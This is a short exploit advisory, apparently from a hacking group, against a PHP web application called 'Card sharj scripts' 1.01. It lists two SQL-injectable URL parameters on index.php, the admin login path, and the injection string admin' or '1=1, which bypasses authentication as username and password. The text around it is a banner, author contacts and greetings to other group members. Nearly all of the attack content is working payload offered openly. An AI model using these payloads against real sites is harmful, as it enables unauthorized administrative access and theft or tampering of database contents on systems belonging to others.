__________.__                 __               ___ ___
\______   \  | _____    ____ |  | __          /   |   \  ____
 |    |  _/  | \__  \ _/ ___\|  |/ /  ______ /    ~    \/ ___\
 |    |   \  |__/ __ \\  \___|    <  /_____/ \    Y    / /_/  >
 |______  /____(____  /\___  >__|_ \          \___|_  /\___  /
        \/          \/     \/     \/                \//_____/
                                                               .ORG

[+] Info=================================================================

 [-] Exploit Title: Card sharj scripts Auth Bypass & Sqli Vulnerability
 [-] Author: Net.Edit0r
 [-] Home : Black-HG.Org
 [-] Version: 1.01
 [-] Software Link: http://dl.xn--mgbguh09aqiwi.com/files/Card-sharj-scripts.rar
 [-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
 [-] Date : 2011 / 09 / 16
 [-] CVE : N/A
 [-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili

[+] Exploit===============================================================

http://127.0.0.1/index.php?cardId=[sql inject]

http://127.0.0.1/index.php?action=[sql inject]

http://localhost/Card-sharj-scripts/admin/index.php

Username & Password: admin' or '1=1


[+] Greets===================================================================+
                                                                             +
Ter0R ~ Hurr!c4nE ~ Cru3l.b0y ~ M4hd1 ~ NoL1m1t ~ s3cure.p0rt ,r3v0lter      +
                                                                             +
Skitt3r ~ cmaxx ~ SkilleR ~ p0w3rfu7 And All #BHG Members                    +
                                                                             +
h4ckcity.org , pentesters.ir, mn-team.net [PersianGulf F0r Ever]             +
                                                                             +
                        <3 I Love You iRAN Far==>D <3                        +
                                                                             +
=============================================================================+